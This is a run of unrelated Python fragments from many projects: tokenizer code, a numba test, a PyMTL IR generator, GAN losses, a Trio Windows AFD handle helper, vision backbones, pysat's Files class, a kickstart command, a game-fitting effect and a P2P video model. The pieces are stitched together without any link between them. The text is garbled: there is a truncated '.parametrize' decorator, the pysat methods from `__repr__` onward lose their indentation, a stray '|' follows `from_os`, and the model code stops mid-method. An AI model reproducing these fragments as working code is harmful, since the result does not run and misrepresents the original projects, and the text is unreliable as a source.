        new_tokens = [str(tok) for tok in new_tokens]
        tokens_to_add = []
        for token in new_tokens:
            if (not isinstance(token, str)):
                raise ValueError(f'Token {token} has to be of type string, but is of type {type(token)}.')
            assert isinstance(token, str)
            if ((token != self.unk_token) and (self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)) and (token not in tokens_to_add)):
                tokens_to_add.append(token)
                if self.verbose:
                    logger.info(f'Adding {token} to the vocabulary')
        added_tok_encoder = {tok: (len(self) + i) for (i, tok) in enumerate(tokens_to_add)}
        added_tok_decoder = {v: k for (k, v) in added_tok_encoder.items()}
        self.added_tokens_encoder.update(added_tok_encoder)
        self.added_tokens_decoder.update(added_tok_decoder)
        for token in tokens_to_add:
            if (len(token) > 1):
                self._additional_special_tokens.append(AddedToken(token))
                _insert_one_token_to_ordered_list(self.unique_no_split_tokens, token)
        self._create_trie(self.unique_no_split_tokens)
        return len(tokens_to_add)
# NOTE(review): the leading `.parametrize(...)` looks like a truncated
# `@pytest.mark.parametrize("v", [...])` decorator — TODO: restore the full
# decorator name; as written this line is a syntax fragment.
.parametrize('v', [set_test_value(ps.float64(), np.array(1.0, dtype='float64'))])
def test_TensorFromScalar(v):
    """Compile `TensorFromScalar(v)` with numba and check it matches the
    pure-Python evaluation for the parametrized scalar input."""
    g = ptb.TensorFromScalar()(v)
    g_fg = FunctionGraph(outputs=[g])
    # Feed the tagged test values of all non-shared, non-constant inputs.
    compare_numba_and_py(g_fg, [i.tag.test_value for i in g_fg.inputs if (not isinstance(i, (SharedVariable, Constant)))])
class BehavioralRTLIRGeneratorL3(BehavioralRTLIRGeneratorL2):
    """Level-3 behavioral RTLIR generator: adds support for BitStruct
    instantiation on top of the L2 generator.

    Note: `s` is PyMTL's conventional name for `self`.
    """

    def visit_Call(s, node):
        """Translate a call node; BitStruct constructors become StructInst IR,
        everything else is delegated to the L2 visitor."""
        obj = s.get_call_obj(node)
        if is_bitstruct_class(obj):
            fields = obj.__bitstruct_fields__
            nargs = len(node.args)
            nfields = len(fields.keys())
            if (nargs == 0):
                # Zero-arg call: instantiate to recover the per-field defaults.
                inst = obj()
                values = [s._datatype_to_bir(getattr(inst, field)) for field in fields.keys()]
            else:
                # Otherwise the call must supply exactly one value per field.
                if (nargs != nfields):
                    raise PyMTLSyntaxError(s.blk, node, f'BitStruct {obj.__name__} has {nfields} fields but {nargs} arguments are given!')
                values = [s.visit(arg) for arg in node.args]
            ret = bir.StructInst(obj, values)
            ret.ast = node
            return ret
        else:
            return super().visit_Call(node)

    def _datatype_to_bir(s, instance):
        """Dispatch a runtime datatype instance (Bits or bitstruct) to IR."""
        if isinstance(instance, Bits):
            return s._bits_to_bir(instance)
        elif is_bitstruct_inst(instance):
            return s._struct_to_bir(instance)
        else:
            assert False, f'unrecognized datatype instance {instance}'

    def _struct_to_bir(s, instance):
        """Recursively convert a bitstruct instance to a StructInst IR node."""
        struct_cls = instance.__class__
        fields = struct_cls.__bitstruct_fields__.keys()
        values = [s._datatype_to_bir(getattr(instance, field)) for field in fields]
        return bir.StructInst(struct_cls, values)

    def _bits_to_bir(s, instance):
        """Convert a Bits value to a width-annotated number IR node."""
        nbits = instance.nbits
        value = int(instance)
        return bir.SizeCast(nbits, bir.Number(value))
def discriminator_loss_func(real_pred, fake_pred, real_pred_edge, fake_pred_edge, edge):
    """Adversarial BCE loss for the discriminator.

    Real predictions are pushed toward 1, fakes toward 0, and both edge
    predictions toward the ground-truth `edge` map. Returns the summed loss
    under the key 'loss_adversarial'.
    """
    bce = nn.BCELoss()
    ones = torch.tensor(1.0).expand_as(real_pred)
    zeros = torch.tensor(0.0).expand_as(fake_pred)
    if torch.cuda.is_available():
        ones = ones.cuda()
        zeros = zeros.cuda()
    loss = bce(real_pred, ones) + bce(fake_pred, zeros)
    loss = loss + bce(real_pred_edge, edge) + bce(fake_pred_edge, edge)
    return {'loss_adversarial': loss.mean()}
def _gen_docx_contract(output, contract, **context):
    """Render the sponsorship contract into a .docx file at `output`.

    The template is chosen by the contract context's 'renewal' flag; extra
    keyword arguments are merged into the template context. Returns `output`.
    """
    context = _contract_context(contract, **context)
    template_name = 'renewal-contract-template.docx' if context['renewal'] else 'contract-template.docx'
    template = os.path.join(settings.TEMPLATES_DIR, 'sponsors', 'admin', template_name)
    doc = DocxTemplate(template)
    doc.render(context)
    doc.save(output)
    return output
def _afd_helper_handle() -> Handle:
    """Open an overlapped handle to the Windows AFD device
    (``\\Device\\Afd\\Trio``) and return it; raises on failure.
    """
    # CreateFileW wants a UTF-16-LE, NUL-terminated device path. The trailing
    # '\\Trio' suffix after Afd is an arbitrary open-packet tag.
    rawname = ('\\\\.\\GLOBALROOT\\Device\\Afd\\Trio'.encode('utf-16le') + b'\x00\x00')
    rawname_buf = ffi.from_buffer(rawname)
    # FILE_FLAG_OVERLAPPED: the handle will be driven asynchronously (IOCP).
    handle = kernel32.CreateFileW(ffi.cast('LPCWSTR', rawname_buf), FileFlags.SYNCHRONIZE, (FileFlags.FILE_SHARE_READ | FileFlags.FILE_SHARE_WRITE), ffi.NULL, FileFlags.OPEN_EXISTING, FileFlags.FILE_FLAG_OVERLAPPED, ffi.NULL)
    if (handle == INVALID_HANDLE_VALUE):
        # Convert the last Win32 error into a Python OSError.
        raise_winerror()
    return handle
def print_commands(prefix: str, obj: CommandClient) -> None:
    """Print every command exposed by `obj`, one per line, as
    "<prefix> -f <command>\\t<doc/args>" with the tab column aligned to the
    longest command string.
    """
    prefix += ' -f '
    cmds = obj.call('commands')
    output = []
    for cmd in cmds:
        doc_args = get_formated_info(obj, cmd)
        pcmd = (prefix + cmd)
        output.append([pcmd, doc_args])
    if not output:
        # Nothing to print — also avoids max() raising on an empty sequence.
        return
    max_cmd = max((len(pcmd) for (pcmd, _) in output))
    formatting = ('{:<%d}\t{}' % (max_cmd + 1))
    for line in output:
        print(formatting.format(line[0], line[1]))
class CoordConv(nn.Module):
    """Conv2d preceded by an AddCoords layer that appends coordinate channels.

    Two coordinate channels (x, y) are appended to the input — three when
    `with_r` also adds a radius channel — so the convolution's input channel
    count is widened accordingly. `use_spect` optionally wraps the conv in
    spectral normalization.
    """

    def __init__(self, input_nc, output_nc, with_r=False, use_spect=False, **kwargs):
        super(CoordConv, self).__init__()
        self.addcoords = AddCoords(with_r=with_r)
        extra_channels = 3 if with_r else 2
        self.conv = spectral_norm(nn.Conv2d(input_nc + extra_channels, output_nc, **kwargs), use_spect)

    def forward(self, x):
        return self.conv(self.addcoords(x))
def compressed_all_to_all(output, input, group=None):
    """All-to-all exchange of `input` shards with dg_compress/dg_decompress
    applied around the communication; results are written into `output`.
    """
    world_size = dist.get_world_size(group)
    rank = torch.distributed.get_rank(group)
    # Split input/output into one contiguous shard per rank.
    ts_in = torch.tensor_split(input, world_size)
    (compressed_a2a_input, _) = dg_compress(ts_in)
    ts_out = torch.tensor_split(output, world_size)
    for i in range(world_size):
        if (i != rank):
            # Exchange shard i with peer i; the local shard (i == rank) stays
            # in place and is only decompressed below.
            # NOTE(review): every rank sends to peer i before receiving from
            # it — this relies on sends being buffered/eager; with blocking
            # rendezvous sends two peers could deadlock. Confirm against the
            # backend in use.
            torch.distributed.send(compressed_a2a_input[i], i)
            torch.distributed.recv(compressed_a2a_input[i], i)
    dg_decompress(compressed_a2a_input, ts_out)
class ClusterNet5gTrunk(ResNetTrunk):
    """ResNet-34-style trunk (BasicBlock, layers [3, 4, 6, 3]) for the
    ClusterNet5g model, with a 3x3 stem conv and an average pool sized to the
    configured input resolution (96, 64 or 32 pixels).
    """

    def __init__(self, config):
        super(ClusterNet5gTrunk, self).__init__()
        self.batchnorm_track = config.batchnorm_track
        block = BasicBlock
        layers = [3, 4, 6, 3]
        in_channels = config.in_channels
        self.inplanes = 64
        # 3x3 stride-1 stem (instead of ImageNet's 7x7/2) suits small inputs.
        self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=3, stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(64, track_running_stats=self.batchnorm_track)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        # Pool size matching the feature-map size each input resolution yields.
        if (config.input_sz == 96):
            avg_pool_sz = 7
        elif (config.input_sz == 64):
            avg_pool_sz = 5
        elif (config.input_sz == 32):
            avg_pool_sz = 3
        else:
            # Previously fell through with `avg_pool_sz` unbound (NameError);
            # fail explicitly instead.
            raise ValueError('Unsupported config.input_sz: %r (expected 96, 64 or 32)' % (config.input_sz,))
        print(('avg_pool_sz %d' % avg_pool_sz))
        self.avgpool = nn.AvgPool2d(avg_pool_sz, stride=1)

    def forward(self, x, penultimate_features=False):
        """Run the trunk; with `penultimate_features` True, stop after layer3
        (skipping layer4 and the average pool). Returns a flat (N, C) tensor.
        """
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        if (not penultimate_features):
            x = self.layer4(x)
            x = self.avgpool(x)
        x = x.view(x.size(0), (- 1))
        return x
class NormalResnetBackbone(nn.Module):
    """Wrap a torchvision-style ResNet so that forward() returns the feature
    maps of all four residual stages (a 4-element list), for use as a dense
    prediction backbone. `num_features` reports the final stage's channels.
    """

    def __init__(self, orig_resnet):
        super(NormalResnetBackbone, self).__init__()
        self.num_features = 2048
        # Reuse the donor network's modules directly (shared parameters).
        self.prefix = orig_resnet.prefix
        self.maxpool = orig_resnet.maxpool
        self.layer1 = orig_resnet.layer1
        self.layer2 = orig_resnet.layer2
        self.layer3 = orig_resnet.layer3
        self.layer4 = orig_resnet.layer4

    def get_num_features(self):
        return self.num_features

    def forward(self, x):
        x = self.maxpool(self.prefix(x))
        stage_outputs = []
        for stage in (self.layer1, self.layer2, self.layer3, self.layer4):
            x = stage(x)
            stage_outputs.append(x)
        return stage_outputs
class Files(object):
    """Maintain the list of local data files for a pysat Instrument.

    Resolves the storage directory from pysat's `data_dirs` parameter plus a
    formatted per-instrument sub-directory, then either refreshes the file
    list from disk or loads a previously stored listing.
    """
    def __init__(self, inst, data_dir=None, directory_format=None, update_files=False, file_format=None, write_to_disk=True, ignore_empty_files=False):
        """Set up file bookkeeping for Instrument `inst`.

        Parameters
        ----------
        inst : pysat.Instrument
            Instrument this Files object serves (held via weakref).
        data_dir : str or None
            Extra top-level data directory, searched before pysat's defaults.
        directory_format : str or None
            Template for the per-instrument sub-directory; defaults to
            pysat.params['directory_format'].
        update_files : bool
            If True, rescan the disk instead of loading the stored listing.
        file_format : str or None
            User-supplied file naming format (stored, used elsewhere).
        write_to_disk : bool
            If False, keep the file listings only in memory.
        ignore_empty_files : bool
            If True, zero-length files are excluded from the listing.
        """
        self.update_files = update_files
        # Location for stored file-list metadata.
        self.home_path = os.path.join(pysat.pysat_dir, 'instruments')
        self.start_date = None
        self.stop_date = None
        self.files = pds.Series(None, dtype='object')
        # weakref avoids an Instrument <-> Files reference cycle.
        self.inst_info = {'platform': inst.platform, 'name': inst.name, 'tag': inst.tag, 'inst_id': inst.inst_id, 'inst_module': inst.inst_module, 'inst': weakref.proxy(inst)}
        self.multi_file_day = inst.multi_file_day
        self.list_files_creator = None
        # Stored listing filename encodes the full instrument identity.
        self.stored_file_name = '_'.join((self.inst_info['platform'], self.inst_info['name'], self.inst_info['tag'], self.inst_info['inst_id'], 'stored_file_info.txt'))
        if (directory_format is None):
            directory_format = pysat.params['directory_format']
        self.directory_format = directory_format
        self.file_format = file_format
        # Instrument-specific sub-directory below each top-level data dir.
        self.sub_dir_path = os.path.normpath(self.directory_format.format(**self.inst_info))
        if (len(pysat.params['data_dirs']) == 0):
            raise NameError(' '.join(("pysat's `data_dirs` hasn't been set.", 'Please set a top-level directory', 'path to store data using', "`pysat.params['data_dirs'] = path`")))
        self.data_paths = [os.path.join(pdir, self.sub_dir_path) for pdir in pysat.params['data_dirs']]
        if (data_dir is not None):
            # User-supplied dir is searched first, both bare and with sub-dir.
            self.data_paths.insert(0, data_dir)
            self.data_paths.insert(0, os.path.join(data_dir, self.sub_dir_path))
        # Normalize and ensure a trailing separator on every candidate path.
        self.data_paths = [os.path.join(os.path.normpath(pdir), '') for pdir in self.data_paths]
        self.data_path = self.data_paths[0]
        self.write_to_disk = write_to_disk
        if (not self.write_to_disk):
            # In-memory stand-ins for the on-disk previous/current listings.
            self._previous_file_list = pds.Series([], dtype='a')
            self._current_file_list = pds.Series([], dtype='a')
        self.ignore_empty_files = ignore_empty_files
        if (self.inst_info['platform'] != ''):
            if self.update_files:
                self.refresh()
            else:
                # Prefer the stored listing; fall back to a disk rescan.
                file_info = self._load()
                if file_info.empty:
                    self.refresh()
                else:
                    self._attach_files(file_info)
        return
def __repr__(self):
inst_repr = self.inst_info['inst'].__repr__()
out_str = ''.join(['pysat.Files(', inst_repr, ', directory_format=', "'{:}'".format(self.directory_format), ', update_files=', '{:}, file_format='.format(self.update_files), '{:}, '.format(self.file_format.__repr__()), 'write_to_disk={:}, '.format(self.write_to_disk), 'ignore_empty_files=', '{:})'.format(self.ignore_empty_files)])
return out_str
def __str__(self):
num_files = len(self.files)
output_str = 'Local File Statistics\n'
output_str += '\n'
output_str += 'Number of files: {:d}\n'.format(num_files)
if (num_files > 0):
output_str += 'Date Range: '
output_str += self.files.index[0].strftime('%d %B %Y')
output_str += ' --- '
output_str += self.files.index[(- 1)].strftime('%d %B %Y')
return output_str
def __eq__(self, other):
if (not isinstance(other, self.__class__)):
return False
checks = []
key_check = []
for key in self.__dict__.keys():
key_check.append(key)
if (key in other.__dict__.keys()):
if (key not in ['files', '_previous_file_list', '_current_file_list', 'inst_info']):
test = np.all((self.__dict__[key] == other.__dict__[key]))
checks.append(test)
elif (key not in ['inst_info']):
try:
check = np.all((self.__dict__[key] == other.__dict__[key]))
checks.append(check)
except ValueError:
return False
elif (key == 'inst_info'):
ichecks = []
for ii_key in self.inst_info.keys():
if (ii_key != 'inst'):
ichecks.append((self.inst_info[ii_key] == other.inst_info[ii_key]))
else:
try:
oinst = other.inst_info[ii_key]
ichecks.append((str(self.inst_info[ii_key]) == str(oinst)))
except AttributeError:
return False
checks.append(np.all(ichecks))
else:
return False
for key in other.__dict__.keys():
if (key not in self.__dict__.keys()):
return False
test_data = np.all(checks)
return test_data
def __getitem__(self, key):
if (self.list_files_creator is not None):
out = self.list_files_creator(key)
elif isinstance(key, slice):
try:
try:
out = self.files.iloc[key]
except TypeError:
out = self.files.loc[key]
except IndexError as err:
raise IndexError(''.join((str(err), '\n', 'Date requested outside file ', 'bounds.')))
if isinstance(key.start, dt.datetime):
if (len(out) > 1):
if (out.index[(- 1)] >= key.stop):
out = out[:(- 1)]
elif (len(out) == 1):
if (out.index[0] >= key.stop):
out = pds.Series([], dtype='a')
else:
try:
out = self.files.iloc[key]
except TypeError:
out = self.files.loc[key]
return out
def _filter_empty_files(self, path):
keep_index = []
for (i, fname) in enumerate(self.files):
full_fname = os.path.join(path, fname)
if os.path.isfile(full_fname):
if (os.path.getsize(full_fname) > 0):
keep_index.append(i)
dropped_num = (len(self.files.index) - len(keep_index))
if (dropped_num > 0):
dstr = ' '.join(('Removing {:d}'.format(dropped_num), 'empty files from Instrument list.'))
pysat.logger.warning(dstr)
self.files = self.files.iloc[keep_index]
return
def _attach_files(self, files_info):
if (not files_info.empty):
self.files = files_info
self._ensure_unique_file_datetimes()
if self.ignore_empty_files:
self._filter_empty_files(path=self.data_path)
if (not self.files.empty):
self.start_date = filter_datetime_input(self.files.index[0])
self.stop_date = filter_datetime_input(self.files.index[(- 1)])
else:
self.start_date = None
self.stop_date = None
else:
self.start_date = None
self.stop_date = None
self.files = files_info.astype(np.dtype('O'))
return
def _ensure_unique_file_datetimes(self):
unique_files = (len(self.files.index.unique()) == len(self.files))
if ((not self.multi_file_day) and (not unique_files)):
estr = ''.join(['Duplicate datetimes in stored filename ', 'information.\nKeeping one of each ', 'of the duplicates, dropping the rest. ', 'Please ensure the file datetimes ', 'are unique at the microsecond level.'])
pysat.logger.warning(estr)
ind = self.files.index.duplicated()
pysat.logger.warning(self.files.index[ind].unique())
idx = np.unique(self.files.index, return_index=True)
self.files = self.files.iloc[idx[1]]
return
def _store(self):
stored_name = self.stored_file_name
stored_files = self._load(update_path=False)
if (len(stored_files) != len(self.files)):
new_flag = True
elif stored_files.eq(self.files).all():
new_flag = False
else:
new_flag = True
if new_flag:
if self.write_to_disk:
prev_name = os.path.join(self.home_path, 'archive', stored_name)
stored_files.to_csv(prev_name, date_format='%Y-%m-%d %H:%M:%S.%f', header=[self.data_path])
self.files.to_csv(os.path.join(self.home_path, stored_name), date_format='%Y-%m-%d %H:%M:%S.%f', header=[self.data_path])
else:
self._previous_file_list = stored_files
self._current_file_list = self.files.copy()
return
def _load(self, prev_version=False, update_path=True):
fname = self.stored_file_name
if prev_version:
fname = os.path.join(self.home_path, 'archive', fname)
else:
fname = os.path.join(self.home_path, fname)
if (os.path.isfile(fname) and (os.path.getsize(fname) > 0)):
if self.write_to_disk:
loaded = pds.read_csv(fname, index_col=0, parse_dates=True, header=0).squeeze('columns')
if update_path:
if (loaded.name in self.data_paths):
dstr = ' '.join(['Assigning `data_path` found', 'in stored file list:', loaded.name])
pysat.logger.debug(dstr)
self.data_path = loaded.name
else:
dstr = ' '.join(['`data_path` found', 'in stored file list is not in', 'current supported `self.data_paths`.', 'Ignoring stored path:', loaded.name, 'Clearing out stored files as well.'])
pysat.logger.debug(dstr)
loaded = pds.Series([], dtype='a')
loaded.name = None
return loaded
elif prev_version:
return self._previous_file_list
else:
return self._current_file_list
else:
return pds.Series([], dtype='a')
return
def _remove_data_dir_path(self, file_series=None):
out = None
if (file_series is not None):
split_str = os.path.join(self.data_path, '')
out = file_series.apply((lambda x: x.split(split_str)[(- 1)]))
return out
def copy(self):
saved_info = self.inst_info
self.inst_info = None
files_copy = copy.deepcopy(self)
self.inst_info = saved_info
files_copy.inst_info = {}
for key in saved_info.keys():
if (key not in ['inst', 'inst_module']):
files_copy.inst_info[key] = copy.deepcopy(self.inst_info[key])
files_copy.inst_info['inst'] = self.inst_info['inst']
files_copy.inst_info['inst_module'] = self.inst_info['inst_module']
return files_copy
def refresh(self):
info_str = '{platform} {name} {tag} {inst_id}'.format(**self.inst_info)
info_str = ' '.join(('pysat is searching for', info_str, 'files.'))
info_str = ' '.join(info_str.split())
pysat.logger.info(info_str)
for path in self.data_paths:
list_files_rtn = self.inst_info['inst']._list_files_rtn
kwarg_inputs = self.inst_info['inst'].kwargs['list_files']
new_files = list_files_rtn(tag=self.inst_info['tag'], inst_id=self.inst_info['inst_id'], data_path=path, format_str=self.file_format, **kwarg_inputs)
if isinstance(new_files, dict):
self.list_files_creator = partial(general.filename_creator, **new_files)
self.start_date = filter_datetime_input(new_files['start_date'])
self.stop_date = filter_datetime_input(new_files['stop_date'])
return
new_files.name = None
if (not new_files.empty):
self.data_path = path
new_files = self._remove_data_dir_path(new_files)
break
pysat.logger.info('Found {:d} local files.'.format(len(new_files)))
if (not new_files.empty):
new_files = new_files.sort_index()
elif pysat.params['warn_empty_file_list']:
pstrs = '\n'.join(self.data_paths)
estr = ''.join(('Unable to find any files that match the supplied ', 'template: ', self.file_format, '\n', 'In the following directories: \n', pstrs))
pysat.logger.warning(estr)
self._attach_files(new_files)
self._store()
return
def set_top_level_directory(self, path):
if (path not in pysat.params['data_dirs']):
estr = "Supplied path not in `pysat.params['data_dirs']`"
raise ValueError(estr)
else:
self.data_path = os.path.join(path, self.sub_dir_path)
return
def get_new(self):
self.refresh()
new_file_series = self._load(update_path=False)
old_file_series = self._load(prev_version=True, update_path=False)
new_files = new_file_series[(- new_file_series.isin(old_file_series))]
return new_files
def get_index(self, fname):
(idx,) = np.where((fname == self.files))
if (len(idx) == 0):
self.refresh()
(idx,) = np.where((fname == np.array(self.files)))
if (len(idx) == 0):
raise ValueError(' '.join(('Could not find "{:}"'.format(fname), 'in available file list. Valid', 'Example:', self.files.iloc[0])))
return idx[0]
def get_file_array(self, start, stop):
starts = pysat.utils.listify(start)
stops = pysat.utils.listify(stop)
files = []
for (sta, stp) in zip(starts, stops):
id1 = self.get_index(sta)
id2 = self.get_index(stp)
files.extend(self.files.iloc[id1:(id2 + 1)])
return files
def from_os(cls, data_path=None, format_str=None, two_digit_year_break=None, delimiter=None):
if (data_path is None):
raise ValueError(' '.join(['Must supply instrument directory path', '(data_path).']))
if (format_str is None):
raise ValueError('Must supply `format_str`.')
search_dict = futils.construct_searchstring_from_format(format_str)
search_str = search_dict['search_string']
files = futils.search_local_system_formatted_filename(data_path, search_str)
if (delimiter is None):
stored = futils.parse_fixed_width_filenames(files, format_str)
else:
stored = futils.parse_delimited_filenames(files, format_str, delimiter)
return futils.process_parsed_filenames(stored, two_digit_year_break) |
def normalize_intersec(i, j, h, w, intersec):
    """Normalize box coordinates, in place, relative to a crop window.

    `intersec` is a flat list of boxes as (x1, y1, x2, y2) quadruples in
    absolute coordinates. Each x is shifted by the crop's left edge `j`
    and divided by the crop width `w`; each y is shifted by the top edge
    `i` and divided by the crop height `h`. Returns the mutated list.
    """
    for base in range(0, (len(intersec) // 4) * 4, 4):
        intersec[base] = (intersec[base] - j) / w
        intersec[base + 2] = (intersec[base + 2] - j) / w
        intersec[base + 1] = (intersec[base + 1] - i) / h
        intersec[base + 3] = (intersec[base + 3] - i) / h
    return intersec
class F28_Authconfig(FC3_Authconfig):
    """Fedora 28 `authconfig` kickstart command.

    Behaves like the FC3 version but emits a deprecation warning steering
    users toward `authselect`, and documents the change in the parser help.
    """

    removedKeywords = FC3_Authconfig.removedKeywords
    removedAttrs = FC3_Authconfig.removedAttrs

    def parse(self, args):
        """Warn that authconfig is deprecated, then defer to the FC3 parser."""
        warnings.warn('The authconfig command will be deprecated, use authselect instead.', KickstartDeprecationWarning)
        return super(F28_Authconfig, self).parse(args)

    def _getParser(self):
        """Extend the inherited parser description with the deprecation note."""
        parser = super(F28_Authconfig, self)._getParser()
        parser.description += dedent(('\n\n .. versionchanged:: %s\n\n The authconfig program is deprecated. This command will use the\n authconfig compatibility tool, but you should use the authselect\n command instead.\n\n ' % versionToLongString(F28)))
        return parser
class Effect11432(BaseEffect):
    """Passive hull effect: boosts `armorDamageAmount` on modules that
    require the Repair Systems skill, scaled by the ship's
    `eliteBonusGunship2` attribute per level of Assault Frigates."""

    type = 'passive'

    def handler(fit, ship, context, projectionRange, **kwargs):
        bonus = ship.getModifiedItemAttr('eliteBonusGunship2')
        fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Repair Systems')), 'armorDamageAmount', bonus, skill='Assault Frigates', **kwargs)
def test_player_play_multiple(player):
    """Queue two short silent sources and verify both are fully consumed."""
    sources = (SilentTestSource(0.1), SilentTestSource(0.1))
    for src in sources:
        player.queue(src)
    player.play()
    # Expect an EOS per source plus the source-transition and player-EOS events.
    player.wait_for_all_events(1.0, 'on_eos', 'on_player_next_source', 'on_eos', 'on_player_eos')
    for src in sources:
        assert (src.bytes_read == src.max_offset), 'Source not fully played'
class P2PModel(nn.Module):
    """Point-to-point (P2P) generation model.

    Combines an encoder/decoder backbone with an LSTM frame predictor and
    learned prior/posterior latent distributions. Generation is conditioned
    on a global descriptor of the control-point (final) frame and on two
    scalar time features: time remaining until the control point and time
    elapsed since the last generated frame.
    """

    def __init__(self, batch_size=100, channels=1, g_dim=128, z_dim=10, rnn_size=256, prior_rnn_layers=1, posterior_rnn_layers=1, predictor_rnn_layers=2, opt=None):
        """Build sub-networks, losses and optimizers.

        Parameters
        ----------
        batch_size : int
            Default batch size used to size the LSTM hidden states.
        channels : int
            Image channel count (image datasets only).
        g_dim : int
            Encoder feature dimension.
        z_dim : int
            Latent variable dimension.
        rnn_size : int
            LSTM hidden size.
        prior_rnn_layers, posterior_rnn_layers, predictor_rnn_layers : int
            Layer counts for the respective LSTMs.
        opt : argparse.Namespace-like
            Run options; must provide `dataset`, `backbone_net`, `lr`,
            `beta1`, `n_past`, `skip_prob`, `beta`, `weight_align`,
            `weight_cpc`, `last_frame_skip`. Mutated here
            (`opt.optimizer` is set to Adam).
        """
        super().__init__()
        self.batch_size = batch_size
        self.channels = channels
        self.g_dim = g_dim
        self.z_dim = z_dim
        self.rnn_size = rnn_size
        self.prior_rnn_layers = prior_rnn_layers
        self.posterior_rnn_layers = posterior_rnn_layers
        self.predictor_rnn_layers = predictor_rnn_layers
        self.opt = opt
        # Inputs are the frame encoding (+ latent or second encoding) plus
        # the two scalar time features (hence the two "+ 1" terms).
        self.frame_predictor = lstm_models.lstm((((self.g_dim + self.z_dim) + 1) + 1), self.g_dim, self.rnn_size, self.predictor_rnn_layers, self.batch_size)
        self.posterior = lstm_models.gaussian_lstm((((self.g_dim + self.g_dim) + 1) + 1), self.z_dim, self.rnn_size, self.posterior_rnn_layers, self.batch_size)
        self.prior = lstm_models.gaussian_lstm((((self.g_dim + self.g_dim) + 1) + 1), self.z_dim, self.rnn_size, self.prior_rnn_layers, self.batch_size)
        # h36m pose data uses keyword-configured encoder/decoder variants.
        if (opt.dataset == 'h36m'):
            self.encoder = opt.backbone_net.encoder(out_dim=self.g_dim, h_dim=self.g_dim)
            self.decoder = opt.backbone_net.decoder(in_dim=self.g_dim, h_dim=self.g_dim)
        else:
            self.encoder = opt.backbone_net.encoder(self.g_dim, self.channels)
            self.decoder = opt.backbone_net.decoder(self.g_dim, self.channels)
        # Side effect: record the optimizer class on the shared options object.
        opt.optimizer = optim.Adam
        self.mse_criterion = nn.MSELoss()
        self.kl_criterion = criterion.KLCriterion(opt=self.opt)
        self.align_criterion = nn.MSELoss()
        self.init_weight()
        self.init_optimizer()

    def init_optimizer(self):
        """Create one optimizer per sub-network using `opt.lr` / `opt.beta1`."""
        opt = self.opt
        self.frame_predictor_optimizer = opt.optimizer(self.frame_predictor.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
        self.posterior_optimizer = opt.optimizer(self.posterior.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
        self.prior_optimizer = opt.optimizer(self.prior.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
        self.encoder_optimizer = opt.optimizer(self.encoder.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
        self.decoder_optimizer = opt.optimizer(self.decoder.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))

    def init_hidden(self, batch_size=1):
        """Reset the hidden states of all three LSTMs for a new sequence."""
        self.frame_predictor.hidden = self.frame_predictor.init_hidden(batch_size=batch_size)
        self.posterior.hidden = self.posterior.init_hidden(batch_size=batch_size)
        self.prior.hidden = self.prior.init_hidden(batch_size=batch_size)

    def init_weight(self):
        """Apply the shared weight initializer to every sub-network."""
        self.frame_predictor.apply(utils.init_weights)
        self.posterior.apply(utils.init_weights)
        self.prior.apply(utils.init_weights)
        self.encoder.apply(utils.init_weights)
        self.decoder.apply(utils.init_weights)

    def get_global_descriptor(self, x, start_ix=0, cp_ix=None):
        """Encode the control-point frame.

        Returns the control-point frame and its encoder feature vector.
        Note: `start_ix` is currently unused.
        """
        if (cp_ix is None):
            cp_ix = (len(x) - 1)
        x_cp = x[cp_ix]
        h_cp = self.encoder(x_cp)[0]
        return (x_cp, h_cp)

    def p2p_generate(self, x, len_output, eval_cp_ix, start_ix=0, cp_ix=(- 1), model_mode='full', skip_frame=False, init_hidden=True):
        """Generate `len_output` frames conditioned on the control point.

        Parameters
        ----------
        x : list of tensors (or tuple for pose data)
            Conditioning sequence; x[0] seeds generation and the last frame
            is the control point.
        len_output : int
            Number of frames (including the seed) to produce.
        eval_cp_ix : int
            Index used to normalize the time features at evaluation.
        model_mode : str
            'posterior', 'prior', or 'full'; selects which latent feeds the
            frame predictor.
        skip_frame : bool
            If True, randomly emit zero frames (skips) with prob `opt.skip_prob`.
        init_hidden : bool
            If True, reset LSTM states before generating.

        Returns
        -------
        list of tensors
            Generated sequence, starting with x[0].
        """
        opt = self.opt
        # Pose datasets arrive as (2d, 3d, camera) tuples; use the 3d poses.
        if (type(x) == tuple):
            (pose_2d, pose_3d, camera_view) = x
            x = pose_3d
            (batch_size, coor, n_dim) = x[0].shape
            dim_shape = (coor, n_dim)
        else:
            (batch_size, channels, h, w) = x[0].shape
            dim_shape = (channels, h, w)
        gen_seq = [x[0]]
        x_in = x[0]
        if init_hidden:
            self.init_hidden(batch_size=batch_size)
        seq_len = len(x)
        cp_ix = (seq_len - 1)
        (x_cp, global_z) = self.get_global_descriptor(x, cp_ix=cp_ix)
        skip_prob = opt.skip_prob
        prev_i = 0
        # Cap the number of skipped frames at skip_prob * sequence length.
        max_skip_count = (seq_len * skip_prob)
        skip_count = 0
        probs = np.random.uniform(0, 1, (len_output - 1))
        for i in range(1, len_output):
            # Never skip the first step or the final (control-point) step.
            if ((probs[(i - 1)] <= skip_prob) and (i >= opt.n_past) and (skip_count < max_skip_count) and (i != 1) and (i != (len_output - 1)) and skip_frame):
                skip_count += 1
                gen_seq.append(torch.zeros_like(x_in))
                continue
            # Scalar time features, broadcast to the batch and placed on the
            # same device/dtype as the control-point frame via .to(x_cp).
            time_until_cp = torch.zeros(batch_size, 1).fill_((((eval_cp_ix - i) + 1) / eval_cp_ix)).to(x_cp)
            delta_time = torch.zeros(batch_size, 1).fill_(((i - prev_i) / eval_cp_ix)).to(x_cp)
            prev_i = i
            h = self.encoder(x_in)
            # `skip` (the encoder's skip connections) is refreshed only while
            # conditioning; afterwards the last stored value is reused.
